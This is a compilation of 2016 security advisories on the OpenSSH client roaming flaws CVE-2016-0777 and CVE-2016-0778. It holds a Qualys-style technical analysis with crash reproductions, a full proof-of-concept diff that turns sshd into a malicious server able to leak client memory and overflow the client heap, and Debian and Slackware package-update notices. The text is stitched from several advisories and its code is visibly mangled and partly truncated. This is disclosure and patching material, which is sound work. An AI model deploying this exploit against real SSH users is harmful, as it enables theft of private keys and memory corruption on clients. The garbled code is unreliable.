packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API) first calloc()ates setp, a file descriptor set for connection_in; next, it loops around memset(), FD_SET(), select() and roaming_read(); last, it free()s setp and returns. Unfortunately, roaming_read() may reassign a higher value to connection_in (if a reconnection occurs), but setp is never enlarged, and the following memset() and FD_SET() may therefore overflow setp (a heap-based buffer overflow):
1048 int 1049 packet_read_seqnr(u_int32_t seqnr_p) 1050 { .... 1052 fd_set setp; .... 1058 setp = (fd_set )xcalloc(howmany(active_state->connection_in + 1, 1059 NFDBITS), sizeof(fd_mask)); .... 1065 for (;;) { .... 1075 if (type != SSH_MSG_NONE) { 1076 free(setp); 1077 return type; 1078 } .... 1083 memset(setp, 0, howmany(active_state->connection_in + 1, 1084 NFDBITS) * sizeof(fd_mask)); 1085 FD_SET(active_state->connection_in, setp); .... 1092 for (;;) { .... 1097 if ((ret = select(active_state->connection_in + 1, setp, 1098 NULL, NULL, timeoutp)) >= 0) 1099 break; .... 1115 } .... 1117 do { .... 1119 len = roaming_read(active_state->connection_in, buf, 1120 sizeof(buf), &cont); 1121 } while (len == 0 && cont); .... 1130 } 1131 / NOTREACHED */ 1132 }
- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is basically similar to packet_read_seqnr() and may overflow its own setp if roaming_write() (called by packet_write_poll()) reassigns a higher value to connection_out (after a successful reconnection):
1739 void 1740 packet_write_wait(void) 1741 { 1742 fd_set setp; .... 1746 setp = (fd_set )xcalloc(howmany(active_state->connection_out + 1, 1747 NFDBITS), sizeof(fd_mask)); 1748 packet_write_poll(); 1749 while (packet_have_data_to_write()) { 1750 memset(setp, 0, howmany(active_state->connection_out + 1, 1751 NFDBITS) * sizeof(fd_mask)); 1752 FD_SET(active_state->connection_out, setp); .... 1758 for (;;) { .... 1763 if ((ret = select(active_state->connection_out + 1, 1764 NULL, setp, NULL, timeoutp)) >= 0) 1765 break; .... 1776 } .... 1782 packet_write_poll(); 1783 } 1784 free(setp); 1785 }
Mitigating Factors
This buffer overflow affects all OpenSSH clients >= 5.4, but its impact is significantly reduced by the Mitigating Factors detailed in the Information Leak section, and additionally:
- OpenSSH versions >= 6.8 reimplement packet_backup_state() and packet_restore_state(), but introduce a bug that prevents the buffer overflow from being exploited; indeed, ssh_packet_backup_state() swaps two local pointers, ssh and backup_state, instead of swapping the two global pointers active_state and backup_state:
9 struct ssh active_state, backup_state; ... 238 void 239 packet_backup_state(void) 240 { 241 ssh_packet_backup_state(active_state, backup_state); 242 } 243 244 void 245 packet_restore_state(void) 246 { 247 ssh_packet_restore_state(active_state, backup_state); 248 }
2269 void 2270 ssh_packet_backup_state(struct ssh ssh, 2271 struct ssh backup_state) 2272 { 2273 struct ssh tmp; .... 2279 if (backup_state) 2280 tmp = backup_state; 2281 else 2282 tmp = ssh_alloc_session_state(); 2283 backup_state = ssh; 2284 ssh = tmp; 2285 } .... 2291 void 2292 ssh_packet_restore_state(struct ssh ssh, 2293 struct ssh backup_state) 2294 { 2295 struct ssh tmp; .... 2299 tmp = backup_state; 2300 backup_state = ssh; 2301 ssh = tmp; 2302 ssh->state->connection_in = backup_state->state->connection_in;
As a result, the global pointer backup_state is still NULL when passed to ssh_packet_restore_state(), and crashes the OpenSSH client when dereferenced:
env ROAMING="overflow:A fd_leaks:0" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 15 %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Segmentation fault (core dumped)
This bug prevents the buffer overflow from being exploited, but not the information leak, because the vulnerable function resend_bytes() is called before ssh_packet_restore_state() crashes.
File Descriptor Leak
A back-of-the-envelope calculation indicates that, in order to increase the file descriptor connection_in or connection_out, and thus overflow the file descriptor set setp in packet_read_seqnr() or packet_write_wait(), a file descriptor leak is needed:
-
First, the number of bytes calloc()ated for setp is rounded up to the nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors) on 64-bit systems.
-
Next, in glibc, this number is rounded up to the nearest multiple of MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit systems.
-
Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit systems, of which 24 bytes (or 192 file descriptors) are reserved for setp.
-
In conclusion, a file descriptor leak is needed, because connection_in or connection_out has to be increased by hundreds in order to overflow setp.
The search for a suitable file descriptor leak begins with a study of the behavior of the four ssh_connect() methods, when called for a reconnection by wait_for_roaming_reconnect():
- The default method ssh_connect_direct() communicates with the server through a simple TCP socket: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old TCP socket is close()d by packet_backup_state(), but immediately reused for the new TCP socket in ssh_connect_direct(): the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
The special ProxyCommand "-" communicates with the server through stdin and stdout, but (as explained in the Mitigating Factors of the Information Leak section) it cannot possibly reconnect to the server, and is therefore immune to this buffer overflow.
-
Surprisingly, we discovered a file descriptor leak in the ssh_proxy_fdpass_connect() method itself; indeed, the file descriptor sp[1] is never close()d:
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 106 int sp[2], sock; ... 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) < 0) 114 fatal("Could not create socketpair to communicate with " 115 "proxy dialer: %.100s", strerror(errno)); ... 161 close(sp[0]); ... 164 if ((sock = mm_receive_fd(sp[1])) == -1) 165 fatal("proxy dialer did not pass back a connection"); ... 171 / Set the connection file descriptors. / 172 packet_set_connection(sock, sock); 173 174 return 0; 175 }
However, two different reasons prevent this file descriptor leak from triggering the setp overflow:
- The method ssh_proxy_fdpass_connect() communicates with the server through a single socket received from the ProxyCommand: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old socket is close()d by packet_backup_state(), reused for sp[0] in ssh_proxy_fdpass_connect(), close()d again, and eventually reused again for the new socket: the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
Because of the waitpid() bug described in the Mitigating Factors of the Information Leak section, the method ssh_proxy_fdpass_connect() calls fatal() before it returns to wait_for_roaming_reconnect(), and is therefore immune to this buffer overflow.
-
The method ssh_proxy_connect() communicates with the server through a ProxyCommand and two different pipes: the file descriptor connection_in is the read end of the second pipe (pout[0]), and the file descriptor connection_out is the write end of the first pipe (pin[1]):
180 static int 181 ssh_proxy_connect(const char host, u_short port, const char proxy_command) 182 { ... 184 int pin[2], pout[2]; ... 192 if (pipe(pin) < 0 || pipe(pout) < 0) 193 fatal("Could not create pipes to communicate with the proxy: %.100s", 194 strerror(errno)); ... 240 / Close child side of the descriptors. / 241 close(pin[0]); 242 close(pout[1]); ... 247 / Set the connection file descriptors. / 248 packet_set_connection(pout[0], pin[1]); 249 250 / Indicate OK return / 251 return 0; 252 }
In wait_for_roaming_reconnect(), the two old, low-numbered file descriptors connection_in and connection_out are both close()d by packet_backup_state(), and immediately reused for the pipe(pin) in ssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of these old, low-numbered file descriptors, and cannot possibly overflow setp.
On the other hand, the pipe(pout) in ssh_proxy_connect() may return high-numbered file descriptors, and the new connection_in (pout[0]) may therefore overflow setp, if hundreds of file descriptors were leaked before the call to wait_for_roaming_reconnect():
- We discovered a file descriptor leak in the pubkey_prepare() function of OpenSSH >= 6.8; indeed, if the client is running an authentication agent that does not offer any private keys, the reference to agent_fd is lost, and this file descriptor is never close()d:
1194 static void 1195 pubkey_prepare(Authctxt *authctxt) 1196 { .... 1200 int agent_fd, i, r, found; .... 1247 if ((r = ssh_get_authentication_socket(&agent_fd)) != 0) { 1248 if (r != SSH_ERR_AGENT_NOT_PRESENT) 1249 debug("%s: ssh_get_authentication_socket: %s", 1250 func, ssh_err(r)); 1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, &idlist)) != 0) { 1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES) 1253 debug("%s: ssh_fetch_identitylist: %s", 1254 func, ssh_err(r)); 1255 } else { .... 1288 authctxt->agent_fd = agent_fd; 1289 } .... 1299 }
However, OpenSSH clients >= 6.8 crash in ssh_packet_restore_state() (because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section) and are immune to the setp overflow, despite this agent_fd leak.
- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH client (it is disabled by default), a malicious SSH server can request hundreds of forwardings, in order to increase connection_in (each forwarding opens a file descriptor), and thus overflow setp in packet_read_seqnr():
env ROAMING="overflow:A" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed] *** Error in `/usr/bin/ssh': free(): invalid next size (fast): 0x00007f0474d03e70 *** Aborted (core dumped)
env ROAMING="overflow:X" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/ssh -X -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1
user@127.0.0.1's password:
[connection suspended, press return to resume][connection resumed]
*** Error in /usr/bin/ssh': free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***
*** Error in
/usr/bin/ssh': malloc(): memory corruption: 0x00007fdcc2a3abc0 ***
Finally, a brief digression on two unexpected problems that had to be solved in our proof-of-concept:
-
First, setp can be overflowed only in packet_read_seqnr(), not in packet_write_wait(), but agent forwarding and X11 forwarding are post- authentication functionalities, and post-authentication calls to packet_read() or packet_read_expect() are scarce, except in the key-exchange code of OpenSSH clients < 6.8: our proof-of-concept effectively forces a rekeying in order to overflow setp in packet_read_seqnr().
-
Second, after a successful reconnection, packet_read_seqnr() may call fatal("Read from socket failed: %.100s", ...), because roaming_read() may return EAGAIN (EAGAIN is never returned without the reconnection, because the preceding call to select() guarantees that connection_in is ready for read()). Our proof-of-concept works around this problem by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server, allowing data to reach the client before roaming_read() is called, thus avoiding EAGAIN.
======================================================================== Acknowledgments ========================================================================
We would like to thank the OpenSSH developers for their great work and their incredibly quick response, Red Hat Product Security for promptly assigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall Project for the interesting discussions.
======================================================================== Proof Of Concept ========================================================================
diff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c --- openssh-6.4p1/auth2-pubkey.c 2013-07-17 23:10:10.000000000 -0700 +++ openssh-6.4p1+roaming/auth2-pubkey.c 2016-01-07 01:04:15.000000000 -0800 @@ -169,7 +169,9 @@ userauth_pubkey(Authctxt authctxt) * if a user is not allowed to login. is this an * issue? -markus / - if (PRIVSEP(user_key_allowed(authctxt->pw, key))) { + if (PRIVSEP(user_key_allowed(authctxt->pw, key)) || 1) { + debug("%s: force client-side load_identity_file", + func); packet_start(SSH2_MSG_USERAUTH_PK_OK); packet_put_string(pkalg, alen); packet_put_string(pkblob, blen); diff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c --- openssh-6.4p1/kex.c 2013-06-01 14:31:18.000000000 -0700 +++ openssh-6.4p1+roaming/kex.c 2016-01-07 01:04:15.000000000 -0800 @@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX], }
static void +roaming_reconnect(void) +{ + packet_read_expect(SSH2_MSG_KEX_ROAMING_RESUME); + const u_int id = packet_get_int(); / roaming_id / + debug("%s: id %u", func, id); + packet_check_eom(); + + const char const dir = get_roaming_dir(id); + debug("%s: dir %s", func, dir); + const int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, dir, errno); + if (fchdir(fd) != 0) + fatal("%s: fchdir %s errno %d", func, dir, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, dir, errno); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED); + packet_put_int64(arc4random()); / chall / + packet_put_int64(arc4random()); / oldchall / + packet_send(); + + packet_read_expect(SSH2_MSG_KEX_ROAMING_AUTH); + const u_int64_t client_read_bytes = packet_get_int64(); + debug("%s: client_read_bytes %llu", func, + (unsigned long long)client_read_bytes); + packet_get_int64(); / digest (1-8) / + packet_get_int64(); / digest (9-16) / + packet_get_int(); / digest (17-20) / + packet_check_eom(); + + u_int64_t client_write_bytes; + size_t len = sizeof(client_write_bytes); + load_roaming_file("client_write_bytes", &client_write_bytes, &len); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + + u_int client_out_buf_size; + len = sizeof(client_out_buf_size); + load_roaming_file("client_out_buf_size", &client_out_buf_size, &len); + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0 || client_out_buf_size > MAX_ROAMBUF) + fatal("%s: client_out_buf_size %u", func, + client_out_buf_size); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_OK); + packet_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size); + packet_send(); + const int overflow = (access("output", F_OK) == 0); + if (overflow != 0) { + const void const ptr = load_roaming_file("output", NULL, &len); + buffer_append(packet_get_output(), ptr, len); + } + packet_write_wait(); + + char const client_out_buf = xmalloc(client_out_buf_size); + if (atomicio(read, packet_get_connection_in(), client_out_buf, + client_out_buf_size) != client_out_buf_size) + fatal("%s: read client_out_buf_size %u errno %d", func, + client_out_buf_size, errno); + if (overflow == 0) + dump_roaming_file("infoleak", client_out_buf, + client_out_buf_size); + fatal("%s: all done for %s", func, dir); +} + +static void kex_choose_conf(Kex kex) { Newkeys newkeys; @@ -470,6 +537,10 @@ kex_choose_conf(Kex kex) kex->roaming = 1; free(roaming); } + } else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) { + roaming_reconnect(); + / NOTREACHED / + fatal("%s: returned from %s", func, KEX_RESUME); }
/* Algorithm Negotiation */
diff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h --- openssh-6.4p1/roaming.h 2011-12-18 15:52:52.000000000 -0800 +++ openssh-6.4p1+roaming/roaming.h 2016-01-07 01:04:15.000000000 -0800 @@ -42,4 +42,86 @@ void resend_bytes(int, u_int64_t ); void calculate_new_key(u_int64_t , u_int64_t, u_int64_t); int resume_kex(void);
+#include
+static int client_session_channel = -1; +static int server_session_channel = -1; + static void server_input_channel_open(int type, u_int32_t seq, void ctxt) { @@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in c->remote_window = rwindow; c->remote_maxpacket = rmaxpack; if (c->type != SSH_CHANNEL_CONNECTING) { + debug("%s: avoid client-side buf_append", func); + / packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); packet_put_int(c->remote_id); packet_put_int(c->self); packet_put_int(c->local_window); packet_put_int(c->local_maxpacket); packet_send(); + */ + if (strcmp(ctype, "session") == 0) { + if (client_session_channel != -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + client_session_channel = c->remote_id; + server_session_channel = c->self; + } } } else { debug("server_input_channel_open: failure %s", ctype); @@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in }
static void +roaming_disconnect(Kex const kex) +{ + const char cp, roaming = getenv("ROAMING"); + if (roaming == NULL) + roaming = "infoleak"; + int overflow = 0; + if ((cp = strstr(roaming, "overflow:")) != NULL) + overflow = cp[9]; + + const u_int client_recv_buf_size = packet_get_int(); + packet_check_eom(); + const u_int server_recv_buf_size = get_recv_buf_size(); + const u_int server_send_buf_size = get_snd_buf_size(); + debug("%s: client_recv_buf_size %u", func, client_recv_buf_size); + debug("%s: server_recv_buf_size %u", func, server_recv_buf_size); + debug("%s: server_send_buf_size %u", func, server_send_buf_size); + + u_int client_send_buf_size = 0; + if ((cp = strstr(roaming, "client_send_buf_size:")) != NULL) + client_send_buf_size = strtoul(cp + 21, NULL, 0); + else if (client_recv_buf_size == DEFAULT_ROAMBUF) + client_send_buf_size = DEFAULT_ROAMBUF; + else { + const u_int + max = MAX(client_recv_buf_size, server_recv_buf_size), + min = MIN(client_recv_buf_size, server_recv_buf_size); + if (min <= 0) + fatal("%s: min %u", func, min); + if (((u_int64_t)(max - min) * 1024) / min < 1) + client_send_buf_size = server_send_buf_size; + else + client_send_buf_size = client_recv_buf_size; + } + debug("%s: client_send_buf_size %u", func, client_send_buf_size); + if (client_send_buf_size <= 0) + fatal("%s: client_send_buf_size", func); + + u_int id = 0; + char dir = NULL; + for (;;) { + id = arc4random(); + debug("%s: id %u", func, id); + free(dir); + dir = get_roaming_dir(id); + if (mkdir(dir, S_IRWXU) == 0) + break; + if (errno != EEXIST) + fatal("%s: mkdir %s errno %d", func, dir, errno); + } + debug("%s: dir %s", func, dir); + if (chdir(dir) != 0) + fatal("%s: chdir %s errno %d", func, dir, errno); + + u_int client_out_buf_size = 0; + if ((cp = strstr(roaming, "client_out_buf_size:")) != NULL) + client_out_buf_size = strtoul(cp + 20, NULL, 0); + else if (overflow != 0) + client_out_buf_size = MAX_ROAMBUF; + else + client_out_buf_size = 1 + arc4random() % 4096; + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0) + fatal("%s: client_out_buf_size", func); + dump_roaming_file("client_out_buf_size", &client_out_buf_size, + sizeof(client_out_buf_size)); + + if ((cp = strstr(roaming, "scp_mode")) != NULL) { + if (overflow != 0) + fatal("%s: scp_mode is incompatible with overflow %d", + func, overflow); + + u_int seconds_left_to_sleep = 3; + if ((cp = strstr(cp, "sleep:")) != NULL) + seconds_left_to_sleep = strtoul(cp + 6, NULL, 0); + debug("%s: sleep %u", func, seconds_left_to_sleep); + + if (client_session_channel == -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + + packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_put_int(client_session_channel); + packet_put_int(server_session_channel); + packet_put_int(0); / server window / + packet_put_int(0); / server maxpacket / + packet_send(); + + packet_start(SSH2_MSG_CHANNEL_DATA); + packet_put_int(client_session_channel); + packet_put_string("\0\n", 2); / response&source|sink&run_err / + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_REQUEST); + packet_get_int(); / server channel / + debug("%s: channel request %s", func, + packet_get_cstring(NULL)); + + while (seconds_left_to_sleep) + seconds_left_to_sleep = sleep(seconds_left_to_sleep); + } + + packet_start(SSH2_MSG_REQUEST_SUCCESS); + packet_put_int(id); / roaming_id / + packet_put_int64(arc4random()); / cookie / + packet_put_int64(0); / key1 / + packet_put_int64(0); / key2 / + packet_put_int(client_out_buf_size - client_send_buf_size); + packet_send(); + packet_write_wait(); + + if (overflow != 0) { + const u_int64_t full_client_out_buf = get_recv_bytes() + + client_out_buf_size; + + u_int fd_leaks = 4 * 8 * 8; / MIN_CHUNK_SIZE in bits / + if ((cp = strstr(roaming, "fd_leaks:")) != NULL) + fd_leaks = strtoul(cp + 9, NULL, 0); + debug("%s: fd_leaks %u", func, fd_leaks); + + while (fd_leaks--) { + packet_start(SSH2_MSG_CHANNEL_OPEN); + packet_put_cstring(overflow == 'X' ? "x11" : + "auth-agent@openssh.com"); / ctype / + packet_put_int(arc4random()); / server channel / + packet_put_int(arc4random()); / server window / + packet_put_int(arc4random()); / server maxpacket / + if (overflow == 'X') { + packet_put_cstring(""); / originator / + packet_put_int(arc4random()); / port / + } + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_get_int(); / server channel / + packet_get_int(); / client channel / + packet_get_int(); / client window / + packet_get_int(); / client maxpacket / + packet_check_eom(); + } + + while (get_recv_bytes() <= full_client_out_buf) { + packet_start(SSH2_MSG_GLOBAL_REQUEST); + packet_put_cstring(""); / rtype / + packet_put_char(1); / want_reply / + packet_send(); + + packet_read_expect(SSH2_MSG_REQUEST_FAILURE); + packet_check_eom(); + } + + if (kex == NULL) + fatal("%s: no kex, cannot rekey", func); + if (kex->flags & KEX_INIT_SENT) + fatal("%s: KEX_INIT_SENT already", func); + char const ptr = buffer_ptr(&kex->my); + const u_int len = buffer_len(&kex->my); + if (len <= 1+4) / first_kex_follows + reserved / + fatal("%s: kex len %u", func, len); + ptr[len - (1+4)] = 1; / first_kex_follows / + kex_send_kexinit(kex); + + u_int i; + packet_read_expect(SSH2_MSG_KEXINIT); + for (i = 0; i < KEX_COOKIE_LEN; i++) + packet_get_char(); + for (i = 0; i < PROPOSAL_MAX; i++) + free(packet_get_string(NULL)); + packet_get_char(); / first_kex_follows / + packet_get_int(); / reserved / + packet_check_eom(); + + char buf[81922]; / two packet_read_seqnr bufferfuls / + memset(buf, '\0', sizeof(buf)); + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL); + packet_put_string(buf, sizeof(buf)); + packet_send(); + const Buffer const output = packet_get_output(); + dump_roaming_file("output", buffer_ptr(output), + buffer_len(output)); + } + + const u_int64_t client_write_bytes = get_recv_bytes(); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + dump_roaming_file("client_write_bytes", &client_write_bytes, + sizeof(client_write_bytes)); + fatal("%s: all done for %s", func, dir); +} + +static void server_input_global_request(int type, u_int32_t seq, void ctxt) { char rtype; @@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_ } else if (strcmp(rtype, "no-more-sessions@openssh.com") == 0) { no_more_sessions = 1; success = 1; + } else if (strcmp(rtype, ROAMING_REQUEST) == 0) { + if (want_reply != 1) + fatal("%s: rtype %s want_reply %d", func, + rtype, want_reply); + roaming_disconnect(ctxt); + / NOTREACHED */ + fatal("%s: returned from %s", func, ROAMING_REQUEST); } if (want_reply) { packet_start(success ? diff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c --- openssh-6.4p1/sshd.c 2013-07-19 20:21:53.000000000 -0700 +++ openssh-6.4p1+roaming/sshd.c 2016-01-07 01:04:15.000000000 -0800 @@ -2432,6 +2432,8 @@ do_ssh2_kex(void) } if (options.kex_algorithms != NULL) myproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms; + else + myproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX "," KEX_RESUME;
if (options.rekey_limit || options.rekey_interval)
packet_set_rekey_limits((u_int32_t)options.rekey_limit,
.
Users with passphrase-less privates keys, especially in non interactive setups (automated jobs using ssh, scp, rsync+ssh etc.) are advised to update their keys if they have connected to an SSH server they don't trust.
More details about identifying an attack and mitigations will be available in the Qualys Security Advisory.
For the oldstable distribution (wheezy), these problems have been fixed in version 1:6.0p1-4+deb7u3.
For the stable distribution (jessie), these problems have been fixed in version 1:6.7p1-5+deb8u1.
For the testing distribution (stretch) and unstable distribution (sid), these problems will be fixed in a later version.
We recommend that you upgrade your openssh packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] openssh (SSA:2016-014-01)
New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix security issues.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssh-7.1p2-i486-1_slack14.1.txz: Upgraded. This update fixes an information leak and a buffer overflow. For more information, see: https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0777 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0778
- IMPORTANT: READ BELOW ABOUT POTENTIALLY INCOMPATIBLE CHANGES *
Rather than backport the fix for the information leak (which is the only hazardous flaw), we have upgraded to the latest OpenSSH. As of version 7.0, OpenSSH has deprecated some older (and presumably less secure) algorithms, and also (by default) only allows root login by public-key, hostbased and GSSAPI authentication. Make sure that your keys and authentication method will allow you to continue accessing your system after the upgrade. The release notes for OpenSSH 7.0 list the following incompatible changes to be aware of: * Support for the legacy SSH version 1 protocol is disabled by default at compile time. * Support for the 1024-bit diffie-hellman-group1-sha1 key exchange is disabled by default at run-time. It may be re-enabled using the instructions at http://www.openssh.com/legacy.html * Support for ssh-dss, ssh-dss-cert- host and user keys is disabled by default at run-time. These may be re-enabled using the instructions at http://www.openssh.com/legacy.html * Support for the legacy v00 cert format has been removed. * The default for the sshd_config(5) PermitRootLogin option has changed from "yes" to "prohibit-password". * PermitRootLogin=without-password/prohibit-password now bans all interactive authentication methods, allowing only public-key, hostbased and GSSAPI authentication (previously it permitted keyboard-interactive and password-less authentication if those were enabled). ( Security fix *) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.1p2-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.1p2-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.1p2-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.1p2-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.1p2-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.1p2-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.1p2-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.1p2-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.1p2-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.1p2-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.1p2-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.1p2-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 856dd9c1b10641c282f30a34b7b63bea openssh-7.1p2-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 80903b0829f0284d007e7a316f2ff2da openssh-7.1p2-x86_64-1_slack13.0.txz
Slackware 13.1 package: 2095d1a304a94bab44993fdb7e0781c8 openssh-7.1p2-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 5bf653d7f5b4a9426ff2c5888af99f00 openssh-7.1p2-x86_64-1_slack13.1.txz
Slackware 13.37 package: 53e09b4371c045b9de1c86e0826324f9 openssh-7.1p2-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: cd0319ff3c574c50612d5ba2b38f2fdc openssh-7.1p2-x86_64-1_slack13.37.txz
Slackware 14.0 package: 98cdc1d6ffea2a06d0c8013078681bff openssh-7.1p2-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 2093f3e91a79e07f072c702a1704be73 openssh-7.1p2-x86_64-1_slack14.0.txz
Slackware 14.1 package: d051d9f31cd380436ad01fa1641be1c7 openssh-7.1p2-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: f1f81757431c3c836f06ce5d22e2d5de openssh-7.1p2-x86_64-1_slack14.1.txz
Slackware -current package: 70db20c5e4152bc9967b1e24cf91ed98 n/openssh-7.1p2-i586-1.txz
Slackware x86_64 -current package: e13dc3da27f817bee693fbb907015817 n/openssh-7.1p2-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg openssh-7.1p2-i486-1_slack14.1.txz
Next, restart the sshd daemon:
sh /etc/rc.d/rc.sshd restart
Then before logging out, make sure that you still have remote access! See the information about incompatible changes in OpenSSH 7.x above.
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iEYEARECAAYFAlaYWioACgkQakRjwEAQIjOwpACfXviFRy4mQxr63HyYu9zLgZ+Z dVsAn0sLTJYcXuCSQYnXNp+FYuIKWjVh =dePf -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05247375
